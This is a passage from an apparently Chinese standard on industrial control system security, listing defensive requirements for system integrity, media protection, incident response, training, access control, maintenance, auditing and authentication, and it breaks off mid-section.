组织应提供自动化机制,在软件和信息完整性异常时通知相关负责人; d) 组织应集中管理完整性验证工具; e) 在传输和使用过程中,组织应提供明显的防篡改包。 6.10.8 信息输入验证(SI-8) 本项要求包括: a) 应检验输入信息的有效性; b) 提供手动重写机制用于输入验证,确保该功能仅用于授权人员,并对该功能进行审计; c) 确保定期对输入验证错误的审查; d) 在收到无效输入时,确保 ICS 按照预定的方式运行; e) 对无效输入的响应不应影响正常运行时序; f) 按组织预定义的格式和内容限制系统输入。 6.10.9 错误处理(SI-9) 本项要求包括: a) 应生成错误信息,该信息中要包含修正错误所必须的信息,且同时不能泄露可能被恶意利用的 信息; b) 应仅向指定的人员通报相关错误信息。 6.10.10 信息处理和留存(SI-10) 本项要求包括: a) 应根据可适用的法律、法规、规章、标准以及运行要求,对ICS 内及ICS 输出的信息进行处理和 留存。 6.10.11 防止可预计的故障(SI-11) 本项要求包括: a) 应确定在特定运行环境中信息组件的平均故障间隔时间; b) 应提供可替代的 ICS 组件、对组件进行激活和建立主备切换的机制; c) 组织应在不迟于平均故障间隔时间内,或定期实现主备组件的切换; d) 组织应禁止在无监督的情况下实施切换; e) 组织应在定义的时间间隔内手动完成主备组件的切换; f) 如果检测到系统组件故障,组织应确保备用系统组件成功并透明地在定义的时间段内发挥 作用。 6.10.12 信息的输出过滤(SI-12) 本项要求包括: a) 应确认软件和应用输出的信息与期望的内容相吻合。 6.10.13 内存防护(SI-13) 本项要求包括: a) 应执行安全保护措施,以防代码在内存中进行未授权的执行。 6.10.14 入侵检测和防护(SI-14) 本项要求包括: a) 应在工业控制系统的安全建设方案中考虑部署入侵检测系统。 6.11 介质保护(MP) 6.11.1 介质保护方针策略与规程(MP-1) 本项要求包括: a) 应制定并发布介质保护方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关 部门的协调、合规性; b) 应制定并发布介质保护规程,以推动介质保护方针策略及与相关安全控制的实施; c) 应定期对介质保护方针策略及规程进行评审和更新。 6.11.2 介质访问(MP-2) 本项要求包括: a) 应只允许被授权的人员或角色对介质进行访问; b) 默认禁止访问; c) 加密保护。 6.11.3 介质标记(MP-3) 本项要求包括: a) 应对系统介质进行标记,标明其中所含信息的分发限制、处理注意事项以及信息的可适用安全 标记。 6.11.4 介质存储(MP-4) 本项要求包括: a) 应在受控区域中,采取物理控制措施并安全地存储磁带、外置/可移动硬盘、U 盘或其他 Flash 存储介质、软盘、CD 、DVD等介质; b) 应定义设施内用来存储信息和存放 ICS 的受控区域; c) 应为这些介质提供持续保护,直到利用经批准的设备、技术和规程对其进行破坏或净化; d) 加密存储,物理安全保护; e) 严格访问控制。 6.11.5 介质传递(MP-5) 本项要求包括: a) 在受控区域之外传递磁带、外置/可移动硬盘、U 盘或其他 Flash 存储介质、软盘、CD 和 DVD 时,应采用适当的安全防护措施进行保护和控制; b) 应维护介质在受控区域之外传递过程的可核查性; c) 应对介质传递相关活动进行记录; d) 应只允许授权人员参与介质传递有关的活动; e) 在介质传输过程中进行加密处理; f) 文档化介质传输相关活动; g) 加强介质传输过程中对委托人管理; h) 组织应在控制区域外加强对介质的保护。 6.11.6 介质净化(MP-6) 本项要求包括: a) 应根据介质净化有关规定和标准,在介质报废、组织控制外使用、回收使用前,采用净化技术和 规程对介质进行净化; b) 所采用的净化机制的强度、覆盖范围应与介质中信息的安全类别或级别相匹配; c) 建立介质销毁前的审阅、批准、跟踪、文件与验证机制;组织审查和批准的介质销毁,以确保符 合组织政策,跟踪介质销毁行动,并验证该销毁过程的合规性; d) 组织测试销毁设备和销毁程序,以验证预期的处理结果; e) 组织按定义的方式销毁便携式存储设备; f) 组织应按国家相关法律、法规规定销毁涉密和受控设备。 6.11.7 介质使用(MP-7) 本项要求包括: a) 应采取安全防护措施限制或禁止在 ICS 或组件中介质(包含数字介质和非数字介质)的使用; b) 组织应禁止未标识的便携式设备在ICS 使用; c) 组织应禁止使用不方便实施销毁和净化处理的介质。 6.12 事件响应(IR) 6.12.1 事件响应方针策略与规程(IR-1) 本项要求包括: a) 应制定并发布事件响应方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关 部门的协调、合规性; b) 应制定并发布事件响应规程,以推动事件响应方针策略及与相关安全控制的实施; c) 应定期对事件响应方针策略及规程进行评审和更新。 6.12.2 事件响应培训(IR-2) 本项要求包括: a) 应制定事件响应培训计划,并定期对 ICS 用户进行符合其角色和责任的事件响应培训; b) 应定期或在 ICS 发生变更时向ICS 用户提供符合其角色和责任的事件响应培训; c) 组织把模拟事件和事件响应结合起来进行培训,以便支持人员在危机情况下的有效响应; d) 组织使用自动化机制,提供更全面、更真实的培训环境。 6.12.3 事件响应测试和演练(IR-3) 本项要求包括: a) 应定期以规定的测试方法测试方案的响应能力,以判断事件响应的有效性,并记录测试结果; b) 应评审事件响应测试和演练的结果,如有不合格项应启动纠正措施; c) 组织使用自动化机制,更全面、更有效地测试或演练事件响应能力; d) 测试数据应认真地加以选择、保护和控制。 6.12.4 事件处理(IR-4) 本项要求包括: a) 应具有应对安全事件的事件处理能力,包括准备、检测和分析、控制、消除和恢复; b) 应协调事件处理活动与应急规划活动; c) 应将当前事件处理活动的经验,纳入事件响应规程、培训及测试/演练,并相应地实施变更; d) 组织使用自动化机制,例如在线的事件管理系统,支持事件处理过程; e) 组织关注 ICS 的动态重新配置,作为事件响应能力的一部分; f) 组织标识事件类别(例如:有目标的有意攻击,无目标的有意攻击,由于设计或实现中的错误和 忽略),并定义响应中所采取的合适动作,确保使命/业务运行的继续; g) 组织建立事件信息和单个事件响应的联系,以实现组织范围内有关事件认的知和响应之观点; h) ICS 一旦出现组织定义的安全损坏列表中的损坏,组织为避免造成更严重的后果,可使其停止 运行。 6.12.5 事件监控(IR-5) 本项要求包括: a) 应跟踪和记录 ICS 安全事件。应引起重视或进行重点监控的事件包括:网络流量突然增大;磁 盘空间溢出或空闲磁盘空间明显减少;异常高的 CPU 使用率;新用户账号创建;试图或实际使 用超级管理员级的账号;账户锁定;用户不工作时,账号仍在使用;清除日志文件;以不常用的 大量事件塞满日志文件;防病毒或 IDS 警报;不可用的防病毒软件和其他安全控制措施;不期 望的补丁变更;非法外联;请求系统信息;配置设置的非期望更改;非期望的系统关闭或重 启等; b) 应使用自动化机制,支持安全事件的跟踪,支持事件信息的收集和分析。 6.12.6 事件报告(IR-6) 本项要求包括: a) 应在规定时间内,向组织的事件响应部门报告可疑的安全事件; b) 应向相关主管部门报告安全事件信息; c) 应使用自动化机制,支持安全事件的报告; d) 向有关的组织官员报告ICS 中与所报告的安全事件相关的弱点、不足和脆弱性。 6.12.7 事件响应帮助(IR-7) 本项要求包括: a) 应提供事件响应支持资源,该资源是组织的事件响应能力必不可少的,以向ICS 用户处理、报 告安全事件提供咨询和帮助; b) 组织使用自动化机制,增加与事件响应有关信息和支持的可用性; c) 组织在其事件响应能力和外部提供方之间,建立一种直接协作的关系;向外部提供方标识组织 的事件响应小组成员。 6.12.8 事件响应计划(IR-8) 本项要求包括: a) 应制定事件响应计划,该计划应包括:实施路线图;事件响应的结构和组织;满足组织的有关使 命、规模、结构和功能的特殊要求;定义可报告事件;定义必要的资源和管理支持,以维护和增 强事件响应能力; b) 应评审事件响应计划并获得批准,并向组织内事件响应人员分发; c) 应定期评审事件响应计划; d) 应针对系统/组织的变更或事件响应计划在实施、执行或测试中遇到的问题,更新计划; e) 应将事件响应计划的变更通报组织内相关部门和人员; f) 应使事件响应计划处于受控状态。 6.13 意识和培训(AT) 6.13.1 安全意识培养和安全培训方针策略和规程(AT-1) 本项要求包括: a) 应制定并发布安全意识培养和安全培训方针策略,内容至少应包括:目的、范围、角色、责任、管 理层承诺、相关部门的协调、合规性; b) 应制定并发布安全意识培养和安全培训规程,以推动安全意识培养和安全培训方针策略及与 相关安全控制的实施; c) 应定期对安全意识培养和安全培训方针策略及规程进行评审和更新。 6.13.2 安全意识培训(AT-2) 本项要求包括: a) 应为包括管理员、高级管理层、承包商在内的 ICS 用户提供安全意识培训; b) 应在新用户的培训中纳入安全意识培训; c) 应定期或系统变更需要培训时,进行安全意识培训; d) 安全意识培训内容应包括 ICS 特定安全方针策略,安全操作程序,ICS 安全趋势和安全漏 洞等; e) 组织开展包括实际练习的安全意识培训以模拟实际的安全攻击; f) 组织开展包括识别和报告内部潜在威胁的安全意识培训。 6.13.3 基于角色的安全培训(AT-3) 本项要求包括: a) 应为 ICS 中的安全角色和具有安全职责的人员提供安全培训; b) 应在新用户的培训中纳入安全培训; c) 应定期或系统变更需要培训时,进行安全培训; d) 安全培训内容应包括ICS 特定安全方针策略,安全操作程序,ICS 安全趋势和安全漏洞等; e) 组织开展包括实际操作的安全培训,以增强安全培训的目标; f) 组织根据初始或定义的频度开展人员和角色培训; g) 组织应向内部人员提供安全培训,使其能够识别ICS 存在的异常行为。 6.13.4 安全培训记录(AT-4) 本项要求包括: a) 应记录并监视 ICS 安全培训活动,包括基本的安全意识培训和特定的 ICS 安全培训; b) 应在规定的时间内保留培训记录。 6.14 访问控制(AC) 6.14.1 访问控制方针策略和规程(AC-1) 本项要求包括: a) 应制定并发布访问控制策略和规程,内容至少应包括:目的、范围、角色、责任、管理层承诺、相 关部门的协调、合规性; b) 应制定并发布访问控制规程,以推动访问控制方针策略及与相关安全控制的实施; c) 应定期对访问控制方针策略及规程进行评审和更新。 6.14.2 账户管理(AC-2) 本项要求包括: a) 应建立不同账号类型(即个人的、组织的、系统的、应用的、访客的/匿名的和临时的),以支持不 同的业务职能; b) 应指定 ICS 账号管理员; c) 应建立明确的组和角色的条件; d) 应建立 ICS、组和角色的授权用户,明确每个账号的访问权限和其他必需的属性; e) 创建 ICS 账号时,应获得相关人员的批准; f) 应建立、激活、修改、关闭和注销账号的制度; g) 应对 ICS 使用进行授权和监视; h) 当账号需要删除、关闭、转移、变更时,应通报账号管理员; i) 定期检查账号是否符合账号管理要求(如:是否符合系统授权,系统、组织、业务的属性); j) 对于预定义了账户和不支持账户管理的ICS 设备,应采用适当的措施(例如,物理安全,人员安 全,入侵检测,审计措施等)来进行访问控制; k) 应限制和控制特殊权限的分配及使用; 1) 应通过正式的管理过程控制口令的分配; m) 管理者应定期使用正式过程对用户的访问权进行复查; n) 应要求用户在选择及使用口令时,遵循良好的安全习惯。 6.14.3 访问执行(AC-3) 本项要求包括: a) ICS 资源的逻辑访问需得到授权和批准; b) 针对所有主体和客体,应实施基于角色的访问控制策略; c) 针对 ICS 范围内属性相同的主体和客体,执行统一策略; d) 应限制将信息传递给未授权的主体和客体; e) 应限制将权限授予给未授权的主体和客体; f) 应限制对主体、客体、ICS 或其组件安全属性的变更; g) 应对新创建或修改后的客体,限制变更其已经关联的安全属性; h) 应限制对访问控制策略的更改; i) 应确保访问控制策略,不会对 ICS 的运营产生不利影响; j) 在组织规定的用户和ICS 相关资源上,执行组织定义的非自主访问控制策略; k) 基于组织策略和规程,执行二元访问授权; 1) ICS 执行自主访问控制(DAC) 策略; m) 除了安全状态外,应禁止 ICS 访问公共网络等组织规定的、与安全有关的信息; n) 在非安全的地方,加密或存储 ICS 安全相关的非在线关键或敏感信息。 6.14.4 信息流执行(AC-4) 本项要求包括: a) ICS 内或互连系统间的信息流动需得到授权和批准; b) 应建立组织机构与外部方交换信息和软件的协议; c) 包含在电子消息发送中的信息应给予适当的保护; d) 应建立并实施策略和规程,以保护与业务系统互联相关的信息; e) 应在网络中实施路由控制,以确保计算机连接和信息流不违反业务应用的访问控制策略。 6.14.5 职责的分割(AC-5) 本项要求包括: a) 必要时,分离个体的职责,以便防止恶意活动; b) 应定义 ICS 的访问授权策略,以支持职责分割; c) 在 ICS 不能支持职责分割的情况下,应采取安全防护措施,对一个人承担多个角色进行有效 管理。 6.14.6 最小权限(AC-6) 本项要求包括: a) 组织应基于最小权限,对用户进行访问授权,使其根据组织使命、业务职能,来完成指定任务; b) 组织应显式地对硬件、软件和固件中所开发的安全功能和安全有关的信息列表授予访问权; c) 组织要求 ICS 系统具有访问安全功能和安全有关的信息列表的 ICS 账户的用户或角色,当访 问其他系统功能时,使用非授权的账户或角色,并且对于这样的功能,如果方便,审计任意对授 权账户或角色的使用; d) 组织按运行需要而定义授权要求,并依据该要求授权网络访问,并在安全计划中为这样访问记 录理由; e) 组织限定指定的系统管理人员,向ICS 的超级用户账户授权; f) 组织应禁止向组织之外的用户授权访问 ICS; g) ICS 提供分离的过程域,以便能精细地分配用户授权; h) ICS 在不支持权限划分的情况下,应采取安全防护措施,对一个人拥有多种权限进行有效管理。 6.14.7 不成功的录入尝试(AC-7) 本项要求包括: a) ICS 应在组织规定的时间间隔内,按定义的次数,限制用户连续无效的访问尝试; b) 自动按组织定义的时间周期,锁死账户,直到管理员予以释放; c) 当未成功尝试超出最大次数时,延迟下一次登入执行; d) 系统自动锁死账户或节点,直到不成功尝试超出最大次数时才予以释放; e) 系统为插入在ICS 中的移动设备提供附加的保护,即在ICS 用户连续不成功登入定义次数后, 净化来自移动设备的信息。 6.14.8 会话封锁(AC-8) 本项要求包括: a) 用户在规定时间未活动或主动发出锁定指令,则开启会话锁定,以防止其他人对系统进行继续 访问; b) 应保持会话锁定,直到用户使用已有的标识和鉴别规程后,重新建立访问连接; c) 当在具有显示屏的设备上启动 ICS 会话锁机制时,该机制应以公共可观察的模式放在相关联 的显示屏上,隐藏该屏幕上以前可见的信息; d) ICS 应尽量采用会话锁定的方式,防止其他人对特定的工作站/节点的访问。在 ICS 操作员工 作站/节点不适宜使用会话锁定的情况下,应采用其他适当的控制措施(例如,增加物理安全, 人员安全和审计措施)。 6.14.9 远程访问(AC-9) 本项要求包括: a) 授权、监督和控制所有对 ICS 的远程访问; b) 组织利用自动机制来监督和控制远程访问方式;部分ICS 可能不支持远程访问; c) 利用密码技术来保护远程访问会话的机密性和完整性,防止鉴别信息在网络传输过程中被窃 听和篡改; d) ICS 通过组织定义的访问控制点的数目,路由所有远程访问; e) 组织仅迫于运行方面的要求,授权执行远程访问并访问与安全有关的信息,远程授权访问要在 工业控制系统安全计划中记录其理由; f) 工业控制系统使用鉴别和加密技术保护对系统的无线访问; g) 组织监控对工业控制系统的授权远程访问,包括定期扫描未授权的无线访问点; h) 对那些不期望使用的无线访问,在工业控制系统部件中嵌入的内部无线网络发挥作用或部署 前,组织应关闭或取消其功能; i) 组织应禁止用户独自配置无线网络; j) 组织确保用户保护了有关远程访问的信息,以免造成未授权的使用和信息泄露; k) 组织确保远程访问组织定义的安全功能和安全有关信息列表的会话,使用了附加的组织认可 的安全措施,并进行了相应的审计; 1) 除了特定运行需求所显式标识的部件外,组织应断掉工业控制系统中点对点无线网络的能力; m) 除了特定运行需求所显式标识的部件外,组织限制被认为是不安全的网络协议。 6.14.10 无线访问(AC-10) 本项要求包括: a) 应建立无线访问的使用限制、配置、连接要求和实施指南; b) 在连接前对通过无线方式访问ICS 进行授权,并对其进行监控; c) 如无必要,应关闭其中内嵌的无线联网功能; d) 应使用鉴别和加密手段保护对系统的无线访问; e) 组织监测未经授权的无线连接,包括扫描未经授权的无线接入点,对发现的未经授权的连接采 取适当的措施; f) 必要时,组织应禁止 ICS 组件内部嵌入式无线网络功能; g) 组织应禁止用户自主配置无线网络功能; h) 组织应管制控制范围内的无线网络; i) 应将传输功率降低至合理级别,确定天线定位,减少无线信号暴露的强度,降低无线信号被外 部接收到的可能性; j) 无线用户的访问应使用安全授权协议来授权; k) 无线访问点应被配置为具有唯一的服务设置识别器(SSID), 使 SSID 不能广播,并且在最小限 度上过滤介质访问控制地址(MAC 地址)。 6.14.11 移动设备的访问控制(AC-11) 本项要求包括: a) 应建立移动设备使用规范; b) 应授权移动设备连接到 ICS 应满足组织规范要求; c) 应监控非授权移动设备接入 ICS; d) 应强化移动设备接入 ICS 需求管理; e) 应禁用ICS 自动执行移动设备可执行代码功能; f) 应对到组织认为存在风险的区域的个人发放特殊配置的移动设备; g) 应对到组织认为存在风险的区域的进行检查或维护的移动设备采用领取归还方式; h) 组织应禁止在涉密系统中使用非涉密移动设备; i) 组织采用全设备加密或容器加密等方式来保护移动设备信息的机密性和完整性; j) 组织应考虑关闭不用的或不必要的I/O 端口; k) 组织应限制 ICS 内可读写、可移动设备的使用; 1) 组织应禁止ICS 内使用个人所有的可移动设备; m) 组织应禁止ICS 内使用未标记的可移动设备; n) 组织应禁止使用移动设备中的无线功能。 6.14.12 外部 ICS的使用(AC-12) 本项要求包括: a) ICS 应建立外部系统的连接协议,并获得批准,才可以与外部系统连接。 b) 外部系统正确实现了相关信息安全策略和安全计划所要求的安全控制措施,并通过了验证,可 以访问ICS。 c) 组织应禁止授权的个体使用外部系统来访问工业控制系统,或处理、存储、传输组织收集的信 息,除非存在以下情况: 1) 可以验证外部系统上所要求的安全控制的实现,像组织工业控制系统安全策略和安全计 划中所规约的那样; 2) 已批准了工业控制系统与外部系统的连接,或批准了组织内实体使用外部系统进行处理 的协议。 d) 组织对授权个体有关使用外部信息系统上组织控制的可移动媒介,施加一些限制。 6.14.13 对程序源代码的访问控制(AC-13) 本项要求包括: a) 应制定规程管理程序、代码和源程序库; b) 应限制访问程序源代码。 6.15 维护(MA) 6.15.1 系统维护方针策略与规程(MA-1) 本项要求包括: a) 应制定并发布 ICS 系统维护方针策略,应包括:目的、范围、角色、责任、管理层承诺、相关部门 的协调、合规性; b) 应制定并发布 ICS 系统维护规程,以推动 ICS 系统维护方针策略及与相关安全控制的实施; c) 应定期对 ICS 系统维护方针策略及规程进行评审和更新。 6.15.2 受控维护(MA-2) 本项要求包括: a) 应根据厂商或供应商的规格说明以及组织的要求,对 ICS 组件的维护和修理进行规划、实施、 记录,并对维护和修理记录进行评审; b) 应审批和监视所有维护行为,不论是现场维护还是远程维护,不论被维护对象是在现场还是被 转移到其他位置; c) 应在将 ICS 或者组件转移到组织外进行非现场的维护或修理前,获得明确批准; d) 应在将 ICS 或者组件转移到组织设外进行非现场的维护或修理前,对设备进行净化,清除有关 信息; e) 应在对系统或组件进行维护或修理后,检查所有可能受影响的安全控制措施以确认其仍正常 发挥功能; f) 应对系统或组件的维护予以记录; g) 产品供应方或维护方应承诺未经用户同意不得采集用户相关信息、不得远程控制用户产品; h) 如果采用远程维护的方式,组织应根据产品的运维需求,为远程控制端口设置控制权限和控制 时间窗; i) 采用自动化的机制定期来组织、规划、实施和记录维护或维修; j) 准确、完整地记录所有的维护或维修的行动计划、要求、过程和完成; k) 在远程维护完成后,组织应安排专人立即关闭为远程维护需求开放的权限设置。 6.15.3 维护工具(MA-3) 本项要求包括: a) 应批准、控制并监视 ICS 维护工具的使用; b) 组织应检查、监督维护人员可能的对 ICS 设备维护工具的不当使用或擅自修改; c) 组织应检查用于 ICS 设备维护的工具、诊断测试程序是否包含恶意代码; d) 组织应防止含组织信息的 ICS 设备或组件在维护或维修时的擅自拆除,确保替换下的设备或 组件包含的信息被消除,从ICS 拆除设备或组件应获得相应的授权; e) 维护工具应限制在授权人员内部使用; f) ICS 维护工具不能收集用户信息。 6.15.4 非本地维护(MA-4) 本项要求包括: a) 应批准、监视非本地维护和诊断活动; b) 应仅允许使用符合组织策略,并在ICS 安全计划中所列出的非本地维护和诊断工具; c) 应在建立非本地维护和诊断会话时采取强鉴别技术; d) 应建立和保存非本地维护和诊断活动的记录,必要时,对记录进行审计和评估; e) 应在非本地维护完成后中止会话和网络连接,必要时,对非本地维护连接中止进行验证; f) 组织应根据已制定的审计策略对远程维护诊断行为进行审计,并审查远程维护诊断期间所有 的行为; g) 组织应在安全策略或安全计划等文件中规范远程维护诊断行为; h) 组织应仅在远程维护诊断期间开放 ICS 或设备的远程维护服务功能;产品或系统供应商应在 交付时告知组织如何关闭/开放远程维护服务功能; i) 组织应采用强认证机制保护远程维护会话,并将该类会话与系统其他会话通过物理或逻辑的 方式进行隔离; j) 组织应根据角色对每个远程维护会话进行授权和确认; k) 组织应采用一定的安全机制实现远程维护会话的机密性和完整性保护; 1) 在远程维护会话终止时,ICS 应进行终止确认。 6.15.5 维护人员(MA-5) 本项要求包括: a) 应建立维护人员的授权流程,并建立已授权的维护组织或人员的列表; b) 应确保维护人员只有在获得访问授权的情况下,才可在没有人员陪同的情况下进行系统维护; c) 应在组织内指定获得授权且技术可胜任的人员,负责对未获得访问授权的维护人员的维护活 动进行监督; d) 对缺乏合适的安全审查的维护人员实施必要的管理,包括组织内部人员的全程陪同; e) 开发并实施必要的安全防护措施,确保对 ICS 的维护不会造成信息删除、断网、中断服务等 影响; f) 确保维护人员进行维护诊断活动对 ICS 处理、存储和传输的信息不会造成破坏性影响; g) 确保维护人员进行维护诊断活动不会对 ICS 处理、存储和传输的机密信息造成泄露。 6.15.6 及时维护(MA-6) 本项要求包括: a) 应在故障发生后的规定时间内,进行 ICS 组件的维护或以备品备件更换; b) 组织应按定义的时间间隔对 ICS 及组件进行预防性的维护诊断; c) 组织应启用一定的机制将预防性维护诊断数据导入管理系统。 6.16 审计和可核查性(AU) 6.16.1 审计和可核查性方针策略和规程(AU-1) 本项要求包括: a) 应制定并发布审计和可核查性方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关部门的协调、合规性; b) 应制定并发布审计和可核查性规程,以推动审计和可核查性方针策略及与相关安全控制的 实施; c) 应定期对审计和可核查性方针策略及规程进行评审和更新。 6.16.2 审计事件(AU-2) 本项要求包括: a) 组织应明确规定审计事件的范围和审计内容。应至少对以下 ICS 事件进行审计:成功和未成 功的账号登录事件、账号管理事件、客体访问、策略变更、特权功能、进程跟踪、系统事件等; b) 应与需要审计信息的其他相关部门进行安全审计协调,增强相互间的支持,并帮助确定审计事 件清单; c) 应提供已确定的审计事件清单,并阐述其足以支撑安全事件事后调查的理由; d) 应确定需连续审计的事件清单; e) 应定期或根据安全威胁情况的变化及时对审计事件清单进行评审和更新; f) 组织应定义审计事件进行定期的审核和升级; g) 应提供编辑审计记录的能力,这些记录来自多重部件,这些部件遍布于系统的逻辑层面、物理 层面及相关于时序的审计痕迹中; h) 提供对审计事件选择的集中管理能力,事件选择被单独的系统部件所审计。 6.16.3 审计记录内容(AU-3) 本项要求包括: a) 应在审计记录中至少包含:事件类型、事件发生的时间和地点、事件来源、事件结果、与事件相 关的用户或主体的身份等; b) 审计记录应使用主题、类型、位置等信息标识审计事件; c) 组织应集中管理审计内容。 6.16.4 对审计处理失败的响应(AU-4) 本项要求包括: a) 应在审计处理失败时向相关人员报警; b) 在审计处理失败时应采取关闭 ICS 系统、重写旧的审计记录、停止产生新的审计记录等措施; c) 应尽量在隔离的系统而不是ICS 本身执行审计记录处理; d) 在组织规定的时间段内,当分配给审计记录的存储量达到组织规定的最大审计记录存储容量 的某一百分比时,ICS 向 ICS 相关负责人提供一个警示; e) 当组织定义的要求实时报警的审计失效事件发生时,ICS 在组织规定的实时报警时间段内,向 ICS 相关负责人发出报警; f) ICS 执行可配置的流量阈值,反映对审计能力的限制,并拒绝或延迟网络流量超出这些阈值; g) 当发生组织定义的审计事件时,ICS 需在以下三种情况中选择一种作为响应:完全或部分宕掉 系统、降低运行模式、仅具有有限可用的业务处理能力,除非存在一种可选的审计能力。 6.16.5 审计评审、分析和报告(AU-5) 本项要求包括: a) 应定期对审计记录进行评审和分析,以发现异常活动; b) 应向相关人员汇报审计结果; c) 应使用自动化机制来整合审查、分析及报告的过程以支持对可疑活动进行的调查和响应; d) 应对不同审计库上的审计记录进行关联性分析,以便感知 ICS 整体的安全态势。 6.16.6 审计归约和报告生成(AU-6) 本项要求包括: a) 应具有审计归约和报告生成的功能,支持按需审计评审、分析和报告要求以及安全事件事后 调查; b) 不应改变原始的审计记录; c) 应尽量在隔离的系统而不是 ICS 本身进行审计归约和报告生成。 6.16.7 时间戳(AU-7) 本项要求包括: a) 应使用ICS 内部时钟生成审计记录的时间戳; b) 应定期对内部时钟与权威时间源进行同步。 6.16.8 审计信息的保护(AU-8) 本项要求包括: a) 应保护审计信息和审计工具,以免遭受未授权访问、篡改、删除; b) 应定期将审计记录备份到与所审系统或组件不同物理位置的系统或组件之中; c) ICS 在所执行的硬件上,在一次性写入的媒介上生成审计记录; d) 应采用加密机制保护审计信息和审计工具的完整性; e) 组织对访问审计功能的授权,只限制为一个具有特权的用户子集;保护审计记录的非本地访 问,仅为授权的账户,并执行授权的功能。 6.16.9 抗抵赖(AU-9) 本项要求包括: a) 应确保被审计动作的不可否认性; b) ICS 定期把审计记录反馈到一个与被审计系统不同的系统或媒介上; c) ICS 使用加密机制来保护审计记录和审计工具的完整性; d) 组织对访问审计功能的授权,只限制为一个具有特权的用户子集; e) ICS 在所执行的硬件上,在一次性写入的媒介上生成审计记录; f) 保护审计记录的非本地访问,仅为授权的账户,并执行授权的功能。 6.16.10 审计记录保留(AU-10) 本项要求包括: a) 应按照记录保留策略保存审计记录以支持安全事件的事后调查,满足法律法规和组织关于信 息保留的要求。 6.16.11 审计生成(AU-11) 本项要求包括: a) ICS 组件应提供相关审计事件的审计记录生成功能; b) 应允许相关人员根据ICS 组件的特定情况选择审计事件; c) 应为审计事件生成符合规定的审计记录; d) 应尽量使用自动化机制生成审计记录; e) 应按时间相关将审计记录从组织定义的系统组件转换为系统的(逻辑或物理)审计跟踪记录; f) 应产生系统的(逻辑或物理)审计跟踪记录的标准化格式; g) 提供在组织规定的时间范围内,进行ICS 审核的能力。 6.17 标识和鉴别(IA) 6.17.1 标识与鉴别方针策略和规程(IA-1) 本项要求包括: a) 应制定并发布标识与鉴别方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相 关部门的协调、合规性; b) 应制定并发布标识与鉴别规程,以推动标识与鉴别方针策略及与相关安全控制的实施; c) 应定期对标识与鉴别方针策略及规程进行评审和更新。 6.17.2 组织用户的标识与鉴别(IA-2) 本项要求包括: a) 信息系统应唯一标识和鉴别组织用户(员工、供应商人员及访客等)或代表该用户的进程; b) 对未授权账户的网络访问,使用多因子鉴别; c) 对已授权账户的本地访问,使用多因子鉴别; d) 对未授权账户的本地访问,使用多因子鉴别; e) 对已授权账户的网络访问,使用多因子鉴别; f) 组织应仅当与个体或特定鉴别员一起使用时,才使用组鉴别;要求在使用组鉴别机制前,要用 个体鉴别机制对个体进行鉴别; g) 对未授权账户的远程访问,使用多因子鉴别,其中一个因子要由与该ICS 分离的设备提供; h) 对未授权账户的本地和网络访问,使用口令或个人标识码; i) ICS 对本地访问,使用口令或个人标识码。 6.17.3 设备的标识与鉴别(IA-3) 本项要求包括: a) 在建立一个或多个本地、远程、网络连接前,应定义的特定设备和/或设备类型列表; b) 在建立远程网络连接前,ICS 应以密码技术为基础,使用设备之间的双向鉴别来鉴别设备; c) 在建立网络连接前,ICS 以密码技术为基础,使用设备之间的双向鉴别来鉴别设备; d) 组织针对动态地址分配,标准化动态主机控制协议(DHCP) 的专用信息以及赋予设备的时间; 并当把这些信息赋予一个设备时,对专用信息进行审计。 6.17.4 标识符管理(IA-4) 本项要求包括: a) 应按照授权策略分配个人、组、角色或设备标识符; b) 应选择用于识别个人、组、角色或设备的标识符; c) 将标识符分配给指定的个人、组、角色或设备; d) 在规定期限内,应防止对标识符的重用; e) 应禁用规定期限内不活动的标识符; f) 应禁止使用ICS 账户标识符作为用户电子邮件账户的公共标识符; g) 应要求接受用户ID 和口令的登记,应具有监督人员的授权,并在指定登记授权前由人来完成 h) 应要求多种形式个体身份的认证,如对该登记授权给出有文件的证据,或给出文件以及生物特 征的组合; i) 应按组织规定标识用户状态的特征,唯一地标识用户,以此来管理用户标识符; j) ICS 动态地管理标识符、属性以及相关联的访问授权 6.17.5 鉴别管理(IA-5) 本项要求包括: a) 初始鉴别分发时,应验证鉴别接收对象(个人、组、角色或设备)的身份。 b) 应确定组织规定的初始鉴别的内容。 c) 应确保鉴别对于其预期使用具有足够强的机制。 d) 应建立和实现管理规程,覆盖鉴别的初始分发、丢失或受损处置以及收回过程。 e) 在信息系统安装之前应变更鉴别的默认内容。 f) 应建立鉴别的最小和最大生存时间、限制以及再用条件。 g) 应定期变更/更新鉴别。 h) 应保护鉴别内容,以防未授权泄露和更改。 i) 应要求个人采取由设备或特定安全措施来保护鉴别。 j) 当组/角色账户的成员发生变化时,应变更这些账户的鉴别。 k) 对于基于PKI 的鉴别,ICS 应: 1) 针对一个接受的可信物,通过构造一个具有状态信息的认证路径,来确认证书; 2) 对对应的私钥,执行授权访问; 3) 把所认证的身份映射为用户账户。 1) 组织要求接受组织定义的鉴别符类型或特定鉴别符的注册过程,在由指定组织官员赋予注册 授权之前由人来承担。 m) 组织使用自动化工具来确定该鉴别符对抵御企图揭示或损坏该鉴别符的攻击而言是否具有充 分的强度。 n) 组织要求ICS 部件供应商或制造者在交付之前,提供唯一的鉴别符或改变默认的鉴别符。 o) 对于基于口令的鉴别,ICS 应: 1) 实施按组织就敏感情况、字符个数、大写小写字符和数字的混合,以及特殊字符等方面定 义的需求的最小口令复杂性; 2) 当创建新口令时,应按组织规定的密码规则; 3) 在口令存储和传输中,对口令加密处理; 4) 实施按组织规定的口令最大和最小生存期的限制; 5) 实施按组织定义的生成次数,禁止口令复用。 p) 组织保护鉴别符,使其相称于所访问信息的保密性和敏感性。 q) 组织确保口令没有被嵌入在访问脚本中或存储在功能键上。 r) 由于存在一些在多个ICS 上拥有账户的个体,因此组织采取规定措施,管理破坏性风险。 6.17.6 鉴别反馈信息(IA-6) 本项要求包括: a) 系统在鉴别过程中应隐藏鉴别信息的反馈,以防鉴别信息可能被未授权个人利用。 6.17.7 密码模块鉴别(IA-7) 本项要求包括: a) 系统应使用密码模块鉴别机制,该密码模块应满足相应的法律法规、规章和标准。 6.17.8 非组织用户的标识与鉴别(IA-8) 本项要求包括: a) 信息系统应唯一标识和鉴别非组织用户(信息系统用户)或代表非组织用户的进程; b) ICS 接受并鉴别其他相关机构发布的单子标识与鉴别; c) ICS 